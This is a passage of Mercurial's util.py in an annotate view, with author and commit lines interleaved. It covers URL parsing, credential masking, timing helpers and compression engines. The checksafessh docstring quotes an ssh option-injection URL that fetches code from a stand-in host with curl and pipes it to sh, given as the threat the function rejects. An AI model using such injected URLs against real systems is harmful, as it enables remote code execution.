    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unquoted in user and passwd when serializing
    _safechars = "!~*'()+"
    # characters left unquoted in path and fragment when serializing
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise error.Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            # local paths (and bundle: paths) are emitted without quoting
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            # bracketed (IPv6) hosts are emitted verbatim
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        """Return ``(url, authinfo)`` with the credentials split out.

        The first item is this URL serialized without user and password.
        The second item is None when there is no user, otherwise the tuple
        ``(None, (url, host), user, passwd or '')``.
        """
        user, passwd = self.user, self.passwd
        try:
            # temporarily blank the credentials so bytes(self) omits them
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        """Return True if this URL is remote or has an absolute path."""
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        # path is None for URLs such as 'file:' or 'file://localhost';
        # treat that as "not absolute" instead of failing on None
        path = self.path or ''
        if hasdriveletter(path):
            return True # absolute for our purposes - can't be joined()
        if path.startswith(br'\\'):
            return True # Windows UNC path
        if path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        """Return the local filesystem path for file: and bundle: URLs.

        For any other URL the original, unparsed string is returned.
        """
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
Brodie Rao
url: move URL parsing functions into util to improve startup time...
def hasscheme(path):
    """Return True if ``path`` parses as a URL with a non-empty scheme."""
    scheme = url(path).scheme
    return bool(scheme)
def hasdriveletter(path):
    """Tell whether ``path`` starts with a drive letter such as ``c:``.

    A falsy ``path`` (None or empty) is returned unchanged; otherwise the
    result is a boolean.
    """
    if not path:
        return path
    if path[1:2] != ':':
        return False
    return path[0:1].isalpha()
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
Mads Kiilerich
util: rename the util.localpath that uses url to urllocalpath (issue2875)...
def urllocalpath(path):
    """Return url.localpath() for ``path``.

    Query and fragment parsing are disabled, so '?' and '#' stay in the
    path.
    """
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
Sean Farley
util: add utility method to check for bad ssh urls (SEC)...
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    # check the unquoted form so a percent-encoded '-' is caught as well
    path = urlreq.unquote(path)
    unsafeprefixes = ('ssh://-', 'svn+ssh://-')
    if path.startswith(unsafeprefixes):
        shown = pycompat.bytestr(path)
        raise error.Abort(_('potentially unsafe url: %r') % (shown,))
Sean Farley
util: add utility method to check for bad ssh urls (SEC)...
r33723
Brodie Rao
url: move URL parsing functions into util to improve startup time...
def hidepassword(u):
    '''hide user credential in a url string'''
    parsed = url(u)
    if parsed.passwd:
        # only mask a password that is actually present
        parsed.passwd = '***'
    return bytes(parsed)
Brodie Rao
url: move URL parsing functions into util to improve startup time...
r14076
def removeauth(u):
    '''remove all authentication information from a url string'''
    parsed = url(u)
    parsed.user = None
    parsed.passwd = None
    return bytes(parsed)
Idan Kamara
util: add helper function isatty(fd) to check for tty-ness
r14515
Bryan O'Sullivan
util: add a timed function for use during development...
# Formatter for durations given in seconds. Each row is passed to
# unitcountfn() as (multiplier, divisor, format), from seconds down to
# nanoseconds.
timecount = unitcountfn(
    # seconds
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    # milliseconds
    (100, 1e-3, _('%.1f ms')),
    (10, 1e-3, _('%.2f ms')),
    (1, 1e-3, _('%.3f ms')),
    # microseconds
    (100, 1e-6, _('%.1f us')),
    (10, 1e-6, _('%.2f us')),
    (1, 1e-6, _('%.3f us')),
    # nanoseconds
    (100, 1e-9, _('%.1f ns')),
    (10, 1e-9, _('%.2f ns')),
    (1, 1e-9, _('%.3f ns')),
)
Martijn Pieters
util: create a context manager to handle timing...
@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution is
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        # a zero elapsed time means the context has not been exited yet
        if not self.elapsed:
            return '<unknown>'
        return timecount(self.elapsed)

    __str__ = encoding.strmethod(__bytes__)
Martijn Pieters
util: create a context manager to handle timing...
@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering a timedcmstats instance is produced.

    This context manager is reentrant.

    ``whencefmt`` and ``whenceargs`` are forwarded to tracing.log().
    """
    # track nested context managers
    timedcm._nested += 1
    stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield stats
    finally:
        # record the duration even when the body raised
        now = timer()
        stats.elapsed = now - stats.start
        timedcm._nested -= 1

# current nesting depth of active timedcm() contexts
timedcm._nested = 0
Bryan O'Sullivan
util: add a timed function for use during development...
r18736
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        label = pycompat.bytestr(func.__name__)
        with timedcm(label) as stats:
            outcome = func(*args, **kwargs)
        # indent the report by the nesting level of the timing context
        indent = ' ' * stats.level * 2
        procutil.stderr.write('%s%s: %s\n' % (indent, label, stats))
        return outcome

    return wrapper
Bryan O'Sullivan
util: migrate fileset._sizetoint to util.sizetoint...
r19194
# (suffix, multiplier) pairs tried in order by sizetoint(); the first suffix
# that ends the lowercased input wins.
_sizeunits = (
    ('m', 2**20),
    ('k', 2**10),
    ('g', 2**30),
    ('kb', 2**10),
    ('mb', 2**20),
    ('gb', 2**30),
    ('b', 1),
)

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, multiplier in _sizeunits:
            if not spec.endswith(suffix):
                continue
            # the numeric part may be fractional, e.g. '2.2kb'
            number = spec[:len(spec) - len(suffix)]
            return int(float(number) * multiplier)
        # no unit suffix: a plain integer byte count
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
Bryan O'Sullivan
summary: augment output with info from extensions
r19211
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hook) pairs
        self._hooks = []

    def add(self, source, hook):
        '''register hook under the name source'''
        entry = (source, hook)
        self._hooks.append(entry)

    def __call__(self, *args):
        '''call every hook with args and return the list of results'''
        self._hooks.sort(key=lambda entry: entry[0])
        return [hook(*args) for _source, hook in self._hooks]
Mads Kiilerich
util: introduce util.debugstacktrace for showing a stack trace without crashing...
r20244
Augie Fackler
util: format line number of stack trace using %d...
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    # the extra -1 drops the frame of this generator itself
    frames = traceback.extract_stack()[:-skip - 1]
    entries = []
    for fn, ln, func, _text in frames:
        location = fileline % (pycompat.sysbytes(fn), ln)
        entries.append((location, pycompat.sysbytes(func)))
    # depth=0 slices as [-0:], which keeps every entry
    entries = entries[-depth:]
    if not entries:
        return
    fnmax = max(len(entry[0]) for entry in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
Mads Kiilerich
util: add debugstacktrace depth limit...
def debugstacktrace(msg='stacktrace', skip=0,
                    f=procutil.stderr, otherf=procutil.stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    header = '%s at:\n' % msg.rstrip()
    f.write(header)
    # skip + 1 hides the frame of this function as well
    for entry in getstackframes(skip + 1, depth=depth):
        f.write(entry)
    f.flush()
Mads Kiilerich
util: introduce util.debugstacktrace for showing a stack trace without crashing...
r20244
Drew Gottlieb
util: move dirs() and finddirs() from scmutil to util...
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> reference count
        self._dirs = {}
        register = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # leave out entries whose first state element equals skip
            for path, state in map.iteritems():
                if state[0] != skip:
                    register(path)
        else:
            for path in map:
                register(path)

    def addpath(self, path):
        counts = self._dirs
        for parent in finddirs(path):
            if parent in counts:
                # stop at the first directory that is already counted
                counts[parent] += 1
                return
            counts[parent] = 1

    def delpath(self, path):
        counts = self._dirs
        for parent in finddirs(path):
            if counts[parent] > 1:
                # directory still referenced: stop here
                counts[parent] -= 1
                return
            del counts[parent]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs
# Use the dirs implementation from the parsers module when it provides one.
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
def finddirs(path):
    """Yield each '/'-separated ancestor directory of ``path``.

    The deepest directory comes first. Nothing is yielded when ``path``
    contains no '/'.
    """
    cut = path.rfind('/')
    while cut >= 0:
        yield path[:cut]
        cut = path.rfind('/', 0, cut)
Gregory Szorc
util: create new abstraction for compression engines...
r30350 # compression code
Gregory Szorc
util: declare wire protocol support of compression engines...
# role names
SERVERROLE = 'server'
CLIENTROLE = 'client'

# record with a wire protocol compression name and one priority per role
compewireprotosupport = collections.namedtuple(
    u'compenginewireprotosupport',
    (u'name', u'serverpriority', u'clientpriority'),
)
Gregory Szorc
util: create new abstraction for compression engines...
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises ValueError for any other argument and ``error.Abort`` when
        the engine name, bundle name, bundle type, wire protocol name or
        revlog header is already taken. Registration is all-or-nothing: the
        lookup tables are only updated once every check has passed.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        # Validate every identifier before touching any table, so that a
        # conflict detected late cannot leave entries that point at an
        # engine which never made it into ``self._engines``.
        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        # Everything checked out: commit the registration.
        if bundleinfo:
            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        if wiresupport:
            self._wiretypes[wiretype] = name

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire protocol name.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]
Gregory Szorc
util: create new abstraction for compression engines...
r30350 compengines = compressormanager()
class compressionengine(object):
    """Base class for compression engines.

    Every compression engine derives from this class and overrides the
    methods for the features it supports.
    """
    def name(self):
        """Return the engine's name, the key it is registered under.

        Subclasses must override this method.
        """
        raise NotImplementedError()

    def available(self):
        """Report whether the engine can actually be used.

        Optional engines (for instance ones backed by a C extension that
        may be missing from an installation) override this to return a
        false value when they cannot be loaded.
        """
        return True

    def bundletype(self):
        """Describe the bundle identifiers of this engine.

        Returns None when the engine cannot be used for bundles.

        Otherwise returns a 2-tuple of strings: the user-facing "bundle
        spec" compression name and the internal identifier denoting the
        compression format within bundles. Set the first element to
        ``None`` to keep the name out of external usage.

        An engine supporting bundles must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell
        users about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this format on the wire protocol.

        Returns None when the engine cannot compress wire protocol
        payloads.

        Otherwise returns a ``compenginewireprotosupport`` with these
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        Priorities order the advertisement of format support by server and
        client: the highest integer is advertised first and non-positive
        values aren't advertised at all.

        The values are somewhat arbitrary and only provide the default
        ordering, which config options can change.

        An engine supporting the wire protocol must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Return the header identifying revlog chunks of this engine.

        Engines usable for revlog compression return the bytes that prefix
        chunks they compressed. Other engines return ``None`` to signal
        that they do not take part in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        ``it`` is an iterator (ideally a generator) of chunks of bytes to
        compress. The result is an iterator (ideally a generator) of
        chunks of compressed bytes.

        ``opts`` optionally tunes the compression; its interpretation is
        specific to each engine.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Wrap a file object so that reads return decompressed data.

        ``fh`` has a ``read(size)`` method returning compressed data. The
        returned object has a ``read(size)`` method returning the
        uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can compress and decompress revlog entries.

        Its ``compress(data)`` method compresses binary data and returns
        the compressed bytes, or ``None`` when the data could not be
        compressed (too small, not compressible, etc). The output should
        start with a header uniquely identifying this format so that
        decompression can be routed back to this engine; that header is
        the ``revlogheader()`` return value.

        Its ``decompress(data)`` method is only called when ``data``
        begins with ``revlogheader()``. It should return the raw,
        uncompressed data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735 class _CompressedStreamReader(object):
def __init__(self, fh):
if safehasattr(fh, 'unbufferedread'):
self._reader = fh.unbufferedread
else:
self._reader = fh.read
self._pending = []
self._pos = 0
self._eof = False
def _decompress(self, chunk):
raise NotImplementedError()
def read(self, l):
buf = []
while True:
while self._pending:
if len(self._pending[0]) > l + self._pos:
newbuf = self._pending[0]
buf.append(newbuf[self._pos:self._pos + l])
self._pos += l
return ''.join(buf)
newbuf = self._pending.pop(0)
if self._pos:
buf.append(newbuf[self._pos:])
l -= len(newbuf) - self._pos
else:
buf.append(newbuf)
l -= len(newbuf)
self._pos = 0
if self._eof:
return ''.join(buf)
chunk = self._reader(65536)
self._decompress(chunk)
Joerg Sonnenberger
util: improve handling of truncated compressed streams...
r39242 if not chunk and not self._pending and not self._eof:
# No progress and no new data, bail out
return ''.join(buf)
Joerg Sonnenberger
ssh: avoid reading beyond the end of stream when using compression...
r38735
class _GzipCompressedStreamReader(_CompressedStreamReader):
    """Stream reader decoding data with a ``zlib`` decompression object."""
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()

    def _decompress(self, chunk):
        decoded = self._decompobj.decompress(chunk)
        if decoded:
            self._pending.append(decoded)

        # Probe for the end of the stream on a copy of the decompressor:
        # feed it one extra byte and check whether that byte comes back
        # untouched in ``unused_data``.
        probe = self._decompobj.copy()
        try:
            probe.decompress('x')
            probe.flush()
        except zlib.error:
            return
        if probe.unused_data == 'x':
            self._eof = True
class _BZ2CompressedStreamReader(_CompressedStreamReader):
    """Stream reader decoding data with ``bz2.BZ2Decompressor``."""
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()

    def _decompress(self, chunk):
        decoded = self._decompobj.decompress(chunk)
        if decoded:
            self._pending.append(decoded)
        # Keep asking with empty input until nothing more comes out. An
        # EOFError from the decompressor is taken as the end of the stream.
        try:
            while True:
                decoded = self._decompobj.decompress('')
                if not decoded:
                    break
                self._pending.append(decoded)
        except EOFError:
            self._eof = True
class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    """BZ2 stream reader that feeds ``'BZ'`` to the decompressor first."""
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        # Prime the decompressor with 'BZ' before any data read from fh
        # (presumably the magic missing from truncated streams -- confirm).
        primed = self._decompobj.decompress('BZ')
        if primed:
            self._pending.append(primed)
class _ZstdCompressedStreamReader(_CompressedStreamReader):
    """Stream reader decoding data with the given ``zstd`` module."""
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()

    def _decompress(self, chunk):
        decoded = self._decompobj.decompress(chunk)
        if decoded:
            self._pending.append(decoded)
        # Keep asking with empty input until nothing more comes out. A
        # ZstdError from the decompressor is taken as the end of the stream.
        try:
            while True:
                decoded = self._decompobj.decompress('')
                if not decoded:
                    break
                self._pending.append(decoded)
        except self._zstd.ZstdError:
            self._eof = True
Gregory Szorc
util: create new abstraction for compression engines...
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        """Yield zlib-compressed chunks for the chunks produced by ``it``.

        ``opts`` may carry a ``level`` entry; -1 is used when it is absent.
        """
        level = (opts or {}).get('level', -1)
        deflater = zlib.compressobj(level)
        for piece in it:
            out = deflater.compress(piece)
            # compress() does not emit data on every call; drop the empty
            # results here rather than pushing them through the generator.
            if out:
                yield out

        yield deflater.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            """Return ``data`` zlib-compressed, or None if that doesn't help.

            None is returned for inputs shorter than 44 bytes and whenever
            the compressed form is not smaller than the input.
            """
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            if insize <= 1000000:
                packed = zlib.compress(data)
                return packed if len(packed) < insize else None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            step = 2**20
            deflater = zlib.compressobj()
            pieces = [deflater.compress(data[start:start + step])
                      for start in range(0, insize, step)]
            pieces.append(deflater.flush())

            if sum(map(len, pieces)) < insize:
                return ''.join(pieces)
            return None

        def decompress(self, data):
            """Return the decompressed ``data``.

            A ``zlib.error`` is reported as ``error.StorageError``.
            """
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()
Gregory Szorc
util: create new abstraction for compression engines...
r30350 compengines.register(_zlibengine())
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        """Yield bz2-compressed chunks for the chunks produced by ``it``.

        ``opts`` may carry a ``level`` entry; 9 is used when it is absent.
        """
        level = (opts or {}).get('level', 9)
        packer = bz2.BZ2Compressor(level)
        for piece in it:
            out = packer.compress(piece)
            # Only forward calls that actually produced output.
            if out:
                yield out

        yield packer.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)
Gregory Szorc
util: create new abstraction for compression engines...
r30350
compengines.register(_bz2engine())
class _truncatedbz2engine(compressionengine):
    """Engine for the internal ``_truncatedBZ`` bundle type.

    It declares no user-facing bundle name and only supports
    decompression.
    """
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No external facing name, only the internal identifier.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)
Gregory Szorc
util: create new abstraction for compression engines...
r30350
compengines.register(_truncatedbz2engine())
Gregory Szorc
util: put compression code next to each other...
r30265
Gregory Szorc
util: create new abstraction for compression engines...
class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

